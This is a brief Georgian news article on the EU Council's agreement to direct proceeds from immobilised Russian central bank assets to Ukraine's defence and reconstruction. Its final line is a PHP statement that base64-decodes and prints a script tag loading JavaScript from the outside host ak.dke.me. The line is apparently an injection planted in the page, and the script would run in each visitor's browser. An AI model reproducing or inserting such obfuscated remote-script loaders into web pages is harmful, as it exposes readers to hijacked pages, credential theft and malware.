celsiusi
ავერსი საქკაბელი

 ევროკავშირის საბჭო რუსული აქტივებიდან მიღებული შემოსავლის უკრაინის სასარგებლოდ კონფისკაციაზე შეთანხმდა, - ინფორმაციას უკრაინული მედია ევროკავშირში ჩეხეთის მუდმივ წარმომადგენლობაზე დაყრდნობით ავრცელებს.

„ევროკავშირის საბჭომ დაადასტურა თანხმობა რუსეთის ფედერაციის ცენტრალური ბანკის იმობილიზებული აქტივებიდან მიღებული შემოსავლების უკრაინის სასარგებლოდ გამოყენებაზე. მოსალოდნელია, რომ წლიური შემოსავალი, დაახლოებით, 2.5-3 მილიარდი ევრო იქნება. მოსალოდნელი შემოსავლის 90% მოხმარდება სამხედრო მიზნებს უკრაინის თავდაცვის მხარდასაჭერად“, - აცხადებენ ევროკავშირში ჩეხეთის მუდმივ წარმომადგენლობაში.

მათივე ინფორმაციით, მოსალოდნელი შემოსავლიდან 10% უკრაინის აღდგენასა და რეკონსტრუქციას მოხმარდება.

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");